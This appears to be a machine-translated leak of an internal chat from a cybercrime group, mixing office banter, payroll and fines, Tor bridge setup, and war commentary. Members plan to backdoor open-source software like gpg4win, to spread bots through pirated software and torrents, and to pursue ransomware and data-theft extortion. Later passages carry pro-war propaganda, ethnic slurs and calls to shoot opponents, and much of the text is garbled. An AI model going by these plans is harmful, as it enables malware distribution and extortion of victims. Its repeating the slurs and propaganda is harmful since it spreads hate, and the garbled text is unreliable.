I have a retro ThinkPad x390 166mmx lying around with Windows 98, working, turned it on here not long ago :rofl: And I like the streamer, it buzzes like a film :) shit, cats are convenient to clean up. I had a punched card!!! I'd like to use them to fill the table with epoxy. Well, those who still have a VM-12 in the closet should stop drinking. I found 386 and 486 processors. All this junk, guys, read and listen to books) I took a 48 Spectrum to the cottage, I will never throw it out. I remember how guys used to make holes in their pants and ask the girls to reach into their pockets and there's a dick in it, maybe they saw *a nail in my pocket, and you?*) better than Edison) Have you seen a StackOverflow keyboard? I've got a streamer with a couple of 230Mb cassettes, it's a shame to throw it away! When I moved in I thought I'd leave the TV as a bonus, but when I found out I had none, I decided to take it back. Now I have three screens, two for width and height and a third for depth.
He how then on BT shutters on the glasses clicks nemoyu TV active 3dne more than thatigrulkada all so the man that sold the TV said "well, I watched a couple of movies and that's it "that's where the fuck his 3D I have glasses on glasses, in general debilism full Oculus Quest 2ya often watched, i often watched Oculus Quest 2a, but i don't know why) v, by the way, in mine i also have 3D porno, guys, i have an artifact behind my back)))) 3D-TV (which are not produced now), UHD - should watch a movie, Stalingrad for example)CALIFORNICATIONNow a couple of seasons and I watched, but beyond that is a pain. And even more to revise the best about sex education chto oy saw it on kino search or on netflix saw, flashed postgvorovyat sex education or something like that like now megaserialvezon two and everything I also watched about these two guysZno know people who Supernaturals revisited, well and friends of the same judging by nostalgia in peopleSits set of goose and gagochet fuck knows what) apparently missed pepts how many Friends have not watched..............and friends is a total cunt. it's like the first SECOND time i've seen it! but the clinic's probably too much to watch for the eighth time. and friends?I'm thinking of watching The Big Bang Theory and The Clinic for the second time. I'm thinking of watching The Big Bang Theory and The Big Bang Clinic. I'm thinking of watching Breaking Bad for the first episode, despite all my innate cynicism.) I don't give a fuck how black it is. 
It's like when Jesse Pinkman had a chick watching TV and he told her it's a TV and it's like very black. and so it's all "marketing show-off", it's clear that it's not CRT) i have 1920 and it also seems a bit rough. when i bought a Xiaomi - i couldn't see the code in full HD - i had to zoom in the compilers, or i'm just colorblind. movies, games, i don't think the start menu is that different, and where can i feel this marketing, except the price in the store? and so just - it's marketing. nu dunno, I have two monitors, a BenQ 28" and a Xiaomi 34" - the difference is enormous, I mean the color gamut. Well, for example, movies: Danila Kozlovsky played new colors on the screen of a MacBook Pro 20, fuck knows. by the way, about the colors. Recently I've been trying to understand, am I able to distinguish the difference between a display with XDR and a simple one, or is it marketing? I'm not saying that the fonts reminded me of it. Spectrum had sprites and 8 colors; the pirate's face reminded me of Spectrum. )))) do you make your own ASCII art or do you take it from somewhere?
░░░░░░░░░░░░░░░▄▄▄▀▀▀▀▄▄▄░░░░░░░░░░░░░░░ ░░░░░░░░░░░░░░░"▄░░░░░░▄"░░░░░░░░░░░░░░░ ░░░░░░░░░░░░░░░░▀▀▀▀▀▀▀▀░░░░░░░░░░░░░░░░ "▄▄░░░░░░░░░░░░░░░▄▄▄▄░░░░░░░░░░░░░░░▄▄ ▀"""▄▄░░░░░░░░░░▄""""""▄░░░░░░░░░░▄▄"""▀ ░░▀▀""""▄▄░░░░░░""""""""░░░░░░▄▄""""▀▀░░ ▀"▄▄░"""""""▄▄░░▀""""""▀░░▄▄"""""""░▄▄"▀ ░░▀▀"""""""""""░░░░▀▀░░░░"""""""""""▀▀░░ ░▀▄▄░""""""""""░"""▀▀"""░""""""""""░▄▄▀░ ░░▀""""""""""""░"""▄▄"""░""""""""""""▀░░ ░░░▀"""""""""""░░""""""░░"""""""""""▀░░░ ░░░░░▀▀"""""""▀░░""""""░░▀"""""""▀▀░░░░░ ░░░░░░░░░░░░░░░▄""""""""▄░░░░░░░░░░░░░░░ ░░░░░░░░░░░░░▄""""""""""""▄░░░░░░░░░░░░░ ░░░░░░░░░░░▄""""""""""""""""▄░░░░░░░░░░░ ░░░░░░░░▄""""""""""""""""""""""▄░░░░░░░░ ░░░░░░▄""""""""""""""""""""""""""▄░░░░░░ ░░░░░░░▀""""""""""""""""""""""""▀░░░░░░░ ░░░░░░░░░░▀▀▀""""""""""""""▀▀▀░░░░░░░░░░ ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ can we drink cognac now?:innocent:the girls were swimming in the lake ... they found a rubber one, i can't get my son to sit down with php, i can't get him to do anything, he's writing poems and novels while i'm working ░▄▄░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▄▄░ """"░░░░░░░░░░░░░░░░░░░░░░░░░░░░""" ▀"""▄░░░░░░░░░░▄▄▄▄▄▄░░░░░░░░░░▄"""▀ ░░░▀""▄""▀░▄""▀▀▀▀▀▀▀▀""▄░▀""▄""▀░░░ ░░░░"""""""▀▄▄▄▄▄""▄▄▄▄▄▀"""""""░░░░ ░░░░"▀""""""""""""""""""""""""▀"░░░░ ░░░░░░░▀""""""""""""""""""""▀░░░░░░░ ░░░░░░░░""▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀"""░░░░░░░ ░░░░░░░░▀"░░▄▄""▄░░▄""▄▄░░"""░░░░░░░ ░░░░░░░░▀"░░"""""░░"""""░░""""░░░░░░ ░░░░░░░░░"▄░░▀▀▀░▄▄░▀▀▀░░▄""""░░░░░░ ░░░░░░░░░░""▄▄░░""""░░▄▄""""""░░░░░░ ░░░░░░░░░▄""""░░""""░░""""""""░░░░░░ ░░░░░░░▄""""▀"░░░░░░░░"▀"""""░░░░░░░ ░░░░▄"""""▀"▄▀▀▀"▀▀"▀▀▀▄"""""""▄░░░░ ░░▀▀▀▀▀░░░░░"▄░░▀░░▀░░▄"▀"""░▀▀▀▀▀░░ ░░░░░░░░░░░░░▀████████▀░░░░▀▀░░░░░░░░ my daughter, who was born on the day of the programmer, is now watching with pleasure) by the way, very smart characters, I would even say exclusive...and here Beavis and Butthead mutated into fixers:grinning:`` it's not me, it's you ``` @silver you 
also tell me that you are waiting for a streetcar :) yeah, videos... (it's not me, it's you; think I want to do it?) thanks, you defused the situation ) https://cs14.pikabu.ru/images/previews_comm/2021-10_1/1633078577184122532.webp :grin: :thumbsup:
actual photo of sylver: https://pikabu.ru/story/universalnyiy_sposob_proverennyiy_vremenem_8511818 coincidences are NOT random!...(c) everything is as usual ) bitch! 48 was almost)) payroll is coming! @all bitcoin 47.000$)
`` My name is an erased hieroglyph, My clothes are patched by the wind `` My last name is Result. What's your first name?) My last name is Result
@silver Isn't your last name Lukashenko by any chance? ))))
mass repressions, it'll soon come down to imprisonment. I didn't think it would come to this, but the lack of discipline is slowing things down. We're a whole army here, but only a couple of teams really work, and the rest - you'll have to excuse me - but it's an army of impotents. Working at night, and I don't know about it, nor do your colleagues - the first time I understand and forgive, the second time you're absent and didn't warn anyone - walk. Away on business (pick up the child, the dentist, whatever else can't wait) - write in your working channels. You know in advance that you won't be there - you wrote to your channels. Came back to work - wrote "I'm back". All questions in a personal note, let it hang here for a day. You have no questions. Whoever has a normal lunch, and not from 12.00 to 16.00, also no questions. What to do if you go out for lunch?
no answer - and no one was warned (that you sat up until night, for example) - half pay. The second time - you've said goodbye. My fucking problem is either autism, or solving personal problems at the expense of the chief. If you ask someone a question here or in the working toad, and the person doesn't answer within 10 minutes, it's considered truancy. This is the last Chinese warning. See that you can miss the money.
frans is preparing the payroll now, as usual; as usual its delivery will take several days, I will remind you guys :vulcan:
this is if it's near the message. If it's next to the nickname at the top, it's the other way around. Green is e2e, gray is OTR. green key is OTR, gray is e2e ... as far as I understand. with Hammer it seemed to work, works now, but before it didn't work. OTR *confidential conversation*??? now check again. well yes, mostly, but sometimes it doesn't work at the interlocutor's end. Hmm :D me and Ham don't work, does this scenario work for everyone? if you don't press for 30 seconds, none of the interlocutors presses OTR, the second one gets a window "do you agree to pay for an incoming call", he doesn't confirm yet, it expires by timeout; when the request is sent it is renamed to safe talk. OTR now requires confirmation. Hi, I have only e2e. everything - then the OTR is glitching again (
would have taken 6-10 times longer, if you didn't buy rizn 9
all, angelo, wings on the shelf, chicken and sleep.... We have to wait for God again? :laughing:) again we're pumping bitok. damn, everything as always )) goodbye (may you dream of buzakoin), don't sleep much, bitcoin is growing - the payroll will come soon) in the word "tea" there are 3 letters, you can't make 4 mistakes in one iteration, here's the deal: "coffee"))) good night! If you make 4 mistakes in the word "tea", it'll be "beer". Benny is his own man, he also gets off on tea.
Yeah, beer and doughnuts are counting.I'll take your build for a test drive, run: |mach run|"destination achieved "zbsEast 4) will be Kermit) if the 4th will be dartanian then I am not so offended) 3 musketeers 3 will be the third brother came Ravshan with Jamshut:laughing:well we are it with you) someone has to do what all in jubilee?Ooh "Gamarjoba") Pongpingabstration by Ostap Benderblin, intrigued, started to do myselfPostavlya yourself avatar)[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=Ph5AHMkJjZDbipvWh) Lousy trash turns out :) my daughter need to show/interested, otherwise she wants to quit art) Not the right neuronku teach, eh not that ... Read their project recently on the generation of code neuronoke. Seems to be fake. It would be very useful to rewrite the algorithm neuronkoy not know, I tried here `https://rudalle.ru` is it all under Unix? The grid or will soon overheat and burst, or will rebel against humanity tried, but very long to do. In the morning it was 4 minutes per picture, now it's 23 @collin and tried to generate yourself? @angelo "the cat has three ears, the second is not out of shape" ?)))) in a couple of examples, I already fell in love with irrevocably interesting pictures can do) https://habr.com/ru/company/sberbank/blog/586926/ ``I didn't buy the masks for nothingNow it's Guy Fawkes' Bonfire Night on the night of 5. Although the 7th is of course a pussy and I congratulate you *with the day of people's Yeltsinism! )*Happy day, guys! Where can I put my bucks! Has anybody written to me in person here? )Observe in kazakhstan maidanu me olivier gone bad, that's it, the holidays are over_###written in the beginning of each line bridge (!)_ - seems to work without the addition `bridge`, I personally added ### here we enter the addresses obtained earlier at the site ## at the beginning of each line bridge (!) 
```
bridge obfs4 ADDRESS1:PORT1 HASH1
bridge obfs4 ADDRESS2:PORT2 HASH2
bridge obfs4 ADDRESS3:PORT3 HASH3
...
```
you must edit the torrc to include the resulting addresses:
```
UseBridges 1
TransPort 9040
ExitPolicy reject *:*
ExtORPort auto
ClientTransportPlugin obfs4 exec /usr/bin/obfs4proxy managed
```
A couple of nuances to this tutorial (here for linux, but the point is clear, edit torrc):
@all Instructions how to get working again: 1. Install any VPN extension for your browser. 2. Get bridges "https://bridges.torproject.org/" 3. Go to the browser settings and under "Find in settings" write "Bridges". 4. Specify your bridges and TorBrowser comes to life.
Instructions on how to restore:
1. Copy the "PluggableTransports" directory and the "torrc" file.
```cmd
cd C:\Users\Admin\Desktop\
copy "Tor Browser\Browser\TorBrowser\Tor\PluggableTransports" TorExpertBundle\Tor\PluggableTransports
copy "Tor Browser\Browser\TorBrowser\Data\Tor\torrc" TorExpertBundle\Tor\torrc
```
2. Modify the contents of the "torrc" file by substituting your directories and new bridges.
```
Bridge obfs4 155.133.16.199:9003 1777CED1816756F493A909A71698B74A7035D422 cert=fUrO/thUgzUoEZvpd3XTSxQhk2nTAdFDtKcDFlatbJtxd6aBMc8+ifPdxNSxlAjtdk7VJg iat-mode=0
Bridge obfs4 168.119.54.228:443 0565AF490133E00709090B109E5ECD071FDCDE1F cert=tELhcFB2ZSs/FvOH58y8Fxnm/bC4yL7peWxN4hDSAfnll9JlO7Wjxcdyt7RvdyscAdDJRQ iat-mode=0
Bridge obfs4 141.5.104.172:8080 518F4BE56C6676A712ACB8B01FB0381FED6CB9A0 cert=4jLw0MmYmAIqigznXfrJCMYnybWXx618OXWQmC4oKBiB9swrxOOtpyZtzbM1u6VwrMAIIA iat-mode=0
DataDirectory C:\Users\Admin\Desktop\TorExpertBundle\Tor\
GeoIPFile C:\Users\Admin\Desktop\TorExpertBundle\geoip
GeoIPv6File C:\Users\Admin\Desktop\TorExpertBundle\geoip6
## obfs4proxy configuration
ClientTransportPlugin obfs4 exec C:\Users\Admin\Desktop\TorExpertBundle\Tor\PluggableTransports\obfs4proxy
```
3. And then we run it:
```cmd
tor.exe -f "C:\Users\Admin\Desktop\TorExpertBundle\Tor\torrc"
```
:laughing: today's decree is already in placewait ohhh shi...and we will introduce troops into the DnR, but fuck no, we will not...We will be happy to see everyone in the near future! Peace. :pray:Japanese goblin :rofl:>Good luck to all, I hope to get together by summer! in the same cell, mwahahahahane miss you, broGood luck to all, I hope to get together by summer![ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/announcements?msg=KGEEpDmCXQz5ciAC6) brent))are there those from 4 years old? know that I will always be with you, in your hearts !And who's the longest working here? See you later! Goodbye, gentlemen! "Meet me at 6 p.m. after the war!" Okay, as it was in Hasek's book, they are clowns, and in the ass we'll be Myselensky - "not some sucker":laughing: can you imagine a clown with beak heels???:clown: :laughing:Babayka has been factored in, but has not yet been embalmed.In short, he has not lived well and should not have started.He sat for an hour and then showed up.Biden called the journalists the other day, they came, but he did not.It is so fucking annoying.We live like this.God knows when?there, our great strategist will address the nation... Mir meat to their ashes... When I put the texts in his mouth, they die (it was my first experience)... I do not want to upset you, but this is not how postal pigeons work (already, bro! I can even make knots) so people do not get bored... so we may pass the time... i tell everyone a secret, learn basic course on networks, or even advanced not a long message to them will fit)but i did not know where to stick, so get the bags out of their asskapetz well i already collected pigeons, letters to send younikada and @angelo how without chat todaa, with you not bored need rocket chat in short, so that people do not get bored. 
so we'll pass the time ))) the homeless will be gone by May)) you should create a chat room somewhere :D))) we can go out for kebabs, but not from cats and not from the homeless cholos - puppets `https://youtu.be/9oHynCkVFX8 `two bmpps drove up to the border, the hoholy ahuelin building rahdan May 9 flag on the Fascist flag hoisted near Kiev, we will definitely get together again, as planned in a couple of months. Peace, labor, May. By May we'll get together! I support you! Put off the decadence, the victory will be ours, history is on our sidePohod they gave us =\fuck, it's a shame they never gave the pindos a blowjob)))))) let me fuck you all up yakhontov you mine in a personal who needs my contact, and who may want to work with me.NAS with all logs and staffhuy, what kind of bakery you have2/3 months just to clean PC I will wait a little more ** *♪ And I'll be on my way ♪ *♪ Follow the hope and the dream ♪ # Don't burn my star, wait... # # Make a Twitter account, so everybody knows when we're gonna work again. Will the message fit in the tweet? Will the toad end up working or will it end? i will wait for 2 or 3 months or more, how much np@all it sucks when one side otr does not activateda i wanted to clarify one point, question removed)holy gigabytes and what do you and i have to do !!!!empty messages@angelo you're active, I'm deactivated receive as I do, shh there, do not betray the officeSomewhere saw a manual generator on Ali - you can pedal with your feet and work on the computer) Homer fitsNo idea that you're operating plutonium batteries!They are warming your head where such inferences are so hard-won! Now I understand where the problem with batteries comes from... From the point of view of banal erudition not every logically thinking individual of this concept can ignore the tendencies of paradoxical emotions, as well as colored illusions and auditory hallucinations, which paradoxically approximate the tendencies of this society. 
However, based on the symmetry of our life, I can say that what is natural is not ugly! mr.Burns)))You can solar panel and micro hydroelectric power plant on the drainpipe from the roof:upside_down:I have free energy at my workplace at the nuclear plant in Springfield, I quietly put some mining farms thereFrances will not support.)Hmm, a very expensive solution. Give me another idea:face_with_monocle:we urgently need our own power plant...Yeah, me too. Tired of giving ...) mnya) me elektrichetsto not pay)) Not bad)))) Discharge itself, and the battery fellow save a battery and always not in time. Anything happens ... And here let me disagree.:) Everyone has an average salary in the country, everyone here himself should take care of their batteries What kind of bidding here arranged) Listen, where to throw? Change your mind write, 10 bucks to throw, it's not a problem Alright, enough spamming - work needed. > Well, what, men? Shall we chip in? Why not? It's a gift, all the more so... it's our brother's pleasure to help. Right. Laptops and other gadgets are all our tools. A tool allows us to do a job. The statement "I don't have a tool" or "it doesn't work", says only that the work can't be done. It's not right. So, a nice gift. What's not? rebuff No need to chip in - I'll buy it myself.You can - what's not that Well, men? Let's chip in? That's November 2 at my birthday and I'll buy it. Or overload the battery.Then the battery, a matter of price 2-3 Kzdaj in uille, the planet does not zasryajuBuy his batteryI'll not trade my laptop for anything!!! I have an ASUS ROG 75. I know what a dead battery looks like)) change the battery in the ass and do not worry. It has wear and tear, yes...@elroy , my battery is dead in my laptop - not enough power even to shut down!!!you aotally - FUCK in orange it's in mandarin? 
putin + statham?And who does not want the reason he wants to look for ways) and in generalYou should have a modem to communicate with you is not very) I gave up the ropes, the phone gives out@allen, laptop lives up to 9 hours, modem. Well, it's enough ... And if the lights went out, as I have today? Sysadmins union! That's just not the union! On the fines - all your disagreements are not accepted, it's not one day, a month for several times. Poetmu again urgently beg all - failing somewhere what - make known silno, still would the union ... and a frame my avatar please a month) agels prmm lntayut) Employee of the month on the 30th of each month announces Silver in this chat. He gets +50% of ZPangelo - I! So we'll have a roll call once every 3 hours soon)))))I hung up this chat after updatingNo matter the chat, I also fix it hangs, hangs in the browser > once at least every 5-6 hours It's worth checking at least once every half hour...and all have a spare link with those with whom they work As I said in private correspondence with you, chats do glitch, but such that a day in general cannot go either in this rocket, nor in tor-jabber, was not once ot myself add, unpleasant, check tor connections to chat and jabber can show but must restart at least once in 5-6 hours, (for those who use tails) + vrpya would like it to be no more, I am extremely unpleasant to do and say these fines will go to the bonus fund for the month employees ) this month, three people fined for truancy, and various scams, which led to lossesragsdeveloper @rags receives this month fined for absence from work without a valid excuseRano.Yes. Friday's coddle.w-job-we say)bijo? 
hamarjob?kamarjoba) good morning pour whiskey, I'm done with New Year's Eve, my daughter ate all the yogurts, guys, one yogurt each and go to bed?I'm not going to be a homer, but I'm going to try to treat them with alcohol for radiation, and cook them as well, but they're fast bitches, you should shoot them first, I'll mail them to you. I'll make a bow and arrow tomorrow. I'll shoot pigeons. Everyone's alive. It's a week. It was 4 days late in January.=( toad pasjaber up!where at least one admin? ugOzhilala toad=) i'm going to sundayi@neville crypte wait, answer:D@neville drunk or what? give the word but will approve over? i cancorrche you tomozavy i tears ooh give me back my 2004th however is it sad? - no, it's sad) no toad, i'll go pee in the piss, i can do everything, thanks to the toad, who's the toad with the docks?) hash@ does anyone know? (@adam save the situation without the toad all the work is worth itpetor-toad works? give me a quick who has 3k? i also have toad does not work toad for everyone? that's tomorrowSorry about the transcription add to the toad monkeymadness@thesecure.biz for further cooperation who is interested, There are funds and experience how to use all the work, the understanding that everything will be profitable. We will try to reorganize the work as soon as possible. I propose to discuss the following topic - the method of delivery of bots through lightweight software, both proprietary and opensource, with any other open source try to do so - inserted the backdoor, compiled, scattered where possible. On torrents, sites, etc. 
It's night now, everyone is probably asleep and there waiting to discuss tkt@rayn@all let's listen @all we have online now @rayn@all I had another idea while I was installing gpg4win The gpg4win is a opensource gpg4win. Compile this gpg4win from open source with a backdoor inserted to read encrypted messages And then we spread out what we get wherever we can. @rags ѕsimply install and create a couple need to exchange keys `https://www.gpg4win.org/` on VMs has long been a complex of all sorts of encryption klbchy stands. There's a key to the encryption / decryption exchange goesklepoatra I knocked him in the toad he knows =) Utility from the kit OpenPGPKleopatra - google found cryptokey manager with this name, is it? We will continue Silver's work - his paranoia will be useful for everyone.the means to all there is and that it will be necessary to write from scratchcleopatrascooperate in the beginning so it will be clear what we dealwitheverything will be clearerand exchangewithout here between each other contacts for the further communication exchange jabber for the further moves we'll find a job in jabber and that's maximum you can write from scratch in three days you'll understand what to work on soon "everything" exchange contacts with the right people, you see in this@all You can try out new ways to collect botnets. Distribute bots via white software: a site with broken software, torrents, etc. Bot resets and runs to disk not immediately, but for example when you select a particular menu item (you can do it that way, at least it worked for me on the notepad) This kind of distribution channel can run for years, because it works invisibly.Thank you.@patrick directly to you.A lot of interesting additional information you have brought recently. but it so happens that your posts are to some extent painful for our team members. My opinion - what you need, I always find without help from outside. Let's not make a show of the war. 
Everyone will decide for himself what is his and what is someone else's. Ok, the chief will come - whistle in a toad, plzIdey on the subject of work and what to do next. The only work topic now is ransomware (I may be wrong, I do not know). Ransomware comes in two varieties, the first type is a locker (the most popular), the second type is to collect dirt from the american comps and pulling money not to publish it. The first type is well-worn, it is not safe and it attracts a lot of unhealthy attention. The second topic is not as well known. It's not as popular as lockers, because it's more complicated than encrypting files and leaving a note on the desktop. I am not suggesting anything in particular, I just suggest that we discuss and think about it. Maybe there are some solutions and ideas, someone knows people who work this way, etc. International - isn't that what we crave? We don't need it. no. You've already identified certain groups for yourself, with whom you will continue to work as a matter of principle, seeing someone "your / not your "can make a separate channel / group - politics?The first thing I saw here on the first day was Kermit's Russophobia and anti-Sovietism, why anyone can and anyone cannot, or it's about quantity, as Captain Jack Sparrow said? I appeal to everyone. Let's stop political agitation. Our goal is to keep working productively. There is no need to carry the whole load of information from all the UTGs in the general chat of our friendly company. Let's stick to a working strategy and further line of building relationships directly "on the fact". If anyone has any constructive suggestions - write immediately via @. Example @all ²Work is needed today. 
And the war was yesterday.now need arbaiten )while the main agenda of the war all need a vacation)?if all are ready there is money there is experience how to use it there is an understanding that everything will be profitable so they have already handed over the money and the technicians to cooperate so that it will be possible in the future to each other or exchangedobavit in the toad) if there is a desire to continue working again but there is time money and desire in the technical plan is weak talk as thereThe customers seem to be in place or I do not understand something work stands)? What do you need? Or something is missing? already there, what is the problem to maintain? and standalone quite> how much time will go to write > Stylac + HVNC so HVNC is there.in tg videopostit that he in kiev )it's too early).zelaya game overts not authorized it just today).there will be more convenient to have a colloquy conversations) added it's more convenient to have collette conversations there )jameswatson added it as a tool to keep in touch if needed don't use Authenticate + so you'll already have someone to talk to first thing) otherwise it all might turn off anytime you want to do something )so you can connect if needed exchange contacts between you++ I copied the contact just in case later will knock (tester) and zp and further %determined tasks will be set in the near futuredobodavit monkeymadness@thesecure.biz and send me id v ryvkom interesting to try, while the network is still a lot of people. not so easy to disperse us turned out to be a lot of people, and Adam need someone from the administration at least, for further discussion, I think, and how many we have in the work how many months of work done and the panel for the further conduct of the HVNC how much time will go to write Kermit suggested to try to self-organize at least for some time is the new commander in chief?What kind of investment is needed to get started? 
Isn't it work to talk about mushrooms?there is a meeting like this ! fly agarics...i will feed zelensky with them jokingly but they did not know that there was a mega tree with killer beech mushrooms near them !ahahaha not just chop it up, like a Christmas tree, but fuck it up in a deadly battle! chopped one mushroom, soup for the whole village :D come to think of it, if you had to not pick it up with your hands, but chop it up with an axe))so you have to hunt them, it's not like that, eh)) Yeah. There fly agarics eat people, not the other way around, as you are used to))))) fly agarics is better there )I would go there, the nature is pptsponali in Pripyat)stop sitting in Chernobyl)not always, before you were born was very normalVeldon say a booze god with you, just AIF yellowish babes always had a cockfuck) then what is the unreliability of aif?Oh, I don't give a fuck honestly, do you want a video interview with them or can you find it yourself? Kerya, the AIF has become a reliable source here :sweat_smile:do you have reliable, proven data? no? Then sit back and sniff your holes. When there will be data, I will report, but so far there are no losses, I do not use a source of "one grandmother said "Who has an account amlbot ?conchita :clown: you grew a beard::Dbla, in this chat you can write yourselfvse, sumos ourSaga about Zmeinom. Zelensky "buried" his soldiers and they surrendered `https://aif.ru/politics/world/saga_o_zmeinom_zelenskiy_pohoronil_svoih_soldat_a_oni_sdalis_v_plen` to salary :joy:bitok at least grows there ozov and some other groups will run with the weapon in the Ua they did everything beautifully, I myself pizdat os bots playnuzhdat more memeponet, themtamnet so it's easier to throw on the secret, there yes, where they got stuck, as they do not do and no one in essence did not do obstacles, they were shooting at kiev, like klitschko did) and a couple hundred casualties, i.e. at least two planes, two helicopters. 
if they cut their losses it will be clear as two*2 And what losses have the slavic brothers got?to take cities without losses, well-nuhaha, well no losses I want to know the price of this whole story @patrick post losses Volunteers or militia of the dnr again it is not ours, they quit six months ago how!that's fucked up of course, will @elroy come out ?! that's it, Kiev is ours all to restPoroshenko has left Ukraine - a source from his entourage.Closer to the night will swatVSU deployed "Grad" installations in residential areas of Kiev The Ministry of Defense reported that Grad launchers have been deployed in residential quarters of Kiev, on Shevchenko Square. They are aimed at our grouping of troops in Gostomel. Obviously, the AFU will cover civilians as a human shield.20 minutes ago Kiev is blockaded from the west side Russian Defense MinistryRussian spies have been given special orders to try to prevent Alexander Turchinov from fleeing Ukraine. Sources in the Russian Defense Ministry say that he is going to be tried for war crimes and unleashing war in the east of the country.`https://www.youtube.com/watch?v=fIrnhCVVFfY]MPs arrive Troeshchina, Kiev, Russian tank columnVorzel under fire.Shots fired in Kiev near Vozdukhoflotsky avenue.20 minutes ago Zelensky offered Putin to sit down at the negotiating table to stop the deathsNot for long time the frayer danced it's Malyuta, the friend of the cleaver`https://t.me/botsmanua` he has a channel in the TV, the videos from hunting will be available to watch40 minutes ago CNN: Vladimir Zelensky was taken to a bunker as Russian troops approach Kiev@biggie hummer is pitiful, idiot gotHead of Rossotrudnichestvo Evgeny Primakov In February 2003, a few weeks before the start of the American military operation in Iraq (yes, incidentally, not approved by any UN Security Council, but who was that to stop it), Saddam Hussein handed out his AKs to the people. 
In principle, there were plenty of guns in all the houses, mostly the bosses' houses. And with all the distrust of his own people (I remember in pre-war Baghdad they cancelled a pro-government demonstration and put machine gunners on the rooftops when they held a small Interior Ministry parade), Saddam decided to arm literally everyone in the city. "Every window in our houses would be turned into a firing point!" - propaganda broadcast. And when the Americans entered the city, it turned out that all these weapons had been disassembled in order to fight off looters or, on the contrary, to loot. A little later, all these guns went underground and are still being used to fight in Iraq and Syria. In July 2011, a month before the fall of the capital, Muammar Gaddafi, fascinated by the mass demonstrations in his support in Tripoli's Green Square, decided to arm Libyans by handing them Kalashas. Then the Americans (leading from behind) led a coalition that bombed peace and democracy into Libya (the Security Council had then agreed to a no-fly zone, but that was a bad start - it did not limit regime change in any way). Muammar Gaddafi believed that the armed people would stand up to defend the gains of the "green revolution. And when Tripoli fell in August, all these weapons were used either to loot or to defend themselves against looting. And they are still firing. When Zelensky decided to distribute 10 thousand kalashnikovs to Kiev citizens, I don't want to compare him with Saddam or Gaddafi or compare us with the Americans - those had completely different reasons and logic: to attack other countries and start wars, while we only stop wars. I'm curious about something else: will 10 thousand Kalashnikovs actually help Zelensky's gop-company to "defend Kiev" (no, they won't) or will they be used according to an established tradition to settle an old score with their neighbors and go to the nearest jewelry store? I suspect that the gop-company may understand this very well. 
But they don't care so much what happens to Ukraine after they're sent to the denazification tribunal that "burn the barn, burn the hut. The Ukrainian government has been trying to make the most of it, but it has not been able to do anything about it, and it has not been able to do anything about it, and it has not been able to do anything about it. The AFU itself shot down a missile over residential areas in Kiev It gets more and more interesting with this morning's incident in Kiev, when the local air defense forces shot down a missile right over residential buildings for some reason. As CNN found out, the missile was mistakenly launched by Ukrainian troops at their own fighter jet, which presumably went down in another area on the outskirts of Kiev. An hour later, Ukrainian President Zelensky published an appeal in which he told citizens that Russians were bombing Ukrainian cities. He called for mercilessly fighting the occupiers and destroying them. There are now crowds of people at the train station in Kiev - they are not allowed to take the train from the capital to Lviv. According to local publications, those wishing to leave cannot leave, police are pushing them back and people are forced to return to the subway. For what reasons - is not yet reported. The police have been waiting for eight years and we fucked up Ukraine when they made a revolution there, and now we're chopping and splintering the wood, so don't sit there dry and go to the front yourself and confuse me about the war.There's a whole gang of them - Dud, Meladze, Lazarev, Morgenstern and others demanding a war with Ukraine! Yekaterina Mizulina has sent statements to the Prosecutor General's Office and the Ministry of Justice to check Yuri Duday for foreign financing. If the verification is confirmed, she calls for the journalist to be recognized as "a person performing the functions of a foreign agent on the territory of Russia". pummel the faggots! 
kiev in pinches, the government quarter is being stormed this is gostomel, 5 km to kiev, 4 hours ago4 hours ago stoltenberg's henhouse reports Ukrainian Deputy Defense Minister Anna Malyar, referring to the hour-old video, reported that Russian troops have entered the borders of Kiev, according to her, they are heading for the capital.5 hours ago In Melitopol Russian special forces entered the SBU building - shots can be heard I felt@biggie you knew! he hacks cameras in Ukraine)Man, where do you get your information! :)Victory Avenue nashkreshchatik our God save the tsar and the exporters !You are for me for odessa n331fuck the juntaSirens on Podol, center of Kiev.Chernigov under siegeAssociated Press reports that gunfire is heard in the government quarter of Kiev.the cockerel, he's still going to buy the riot pug on the streams toldBucha, a suburb of kiev, ours)Zhitomir ours I wonder how the Finns feel now )now Patrick will tell us when he's done with the banders - I have a lot of rifles now they do not have it hahaha can they let them live in their country?The Taliban call for a peaceful solution to the conflict in Ukraine. What's the matter, Patrick, if a person doesn't agree with you he should just go to the wall?) Both grandfather and grandmother, they had no choice! The NKVD had no choice! 
They should have killed their own people, they should have, I will tell Grandpa when I see him happy Holidays :beers:Worse than tekaklenin and stalin the murderer stalin was right and stalin was right, so I see, navalnists should be shot on sight, in my heart the Spanish conquistador died and the tartar rose again:laughing:Stalin the GeorgianLenin also Jesus the Jew See, son, says Jesus, that man over there, he killed your parents and you, go and embrace him, now you will all live together in my kingdom Neanderthals would be aa WITHOUT negroes there would be no Ukraine and today's war without Kievan Rus without Comunia* "All irritation and rage and anger and yelling and rancor with all malice shall be removed from you; But be kind and compassionate to one another, forgiving one another, as God in Christ has forgiven you. What's up with the clowns? @biggie the good, i.e. the ussr, had nothing to make it out of but evil, i.e. the russian empire. We'll all cut each other up on this planet soon, so we need a military operation in israel to de-Jewishize@jesus!We need Jesus, only he will judge and tell the truth, who God is for! Fuck, I am already confused who is for what and why! The Soviet factories were built by Americans and Europeans with the hands of our comrades. The empire was ruined by the Jews with England's money. It's only fair that the Soviets should answer for the collapse of the Russian empire, and everyone, including the pindostan, should answer for the destruction of my homeland - the USSR...." would have looked a bit more scrupulousGeorgia will not join the sanctions against Russia.starobelsk nashkievskaya obolny naschane, viskarik naschane, I look satiated painfully and storming kievaty hungry shtole?I look at the price tag in the store and I start to rejoice, my soul sings when they reach into my pocket and others clap their hands - thank you! I always forget that we are all exporters! All 140 million people! I'm so happy about this. What for? 
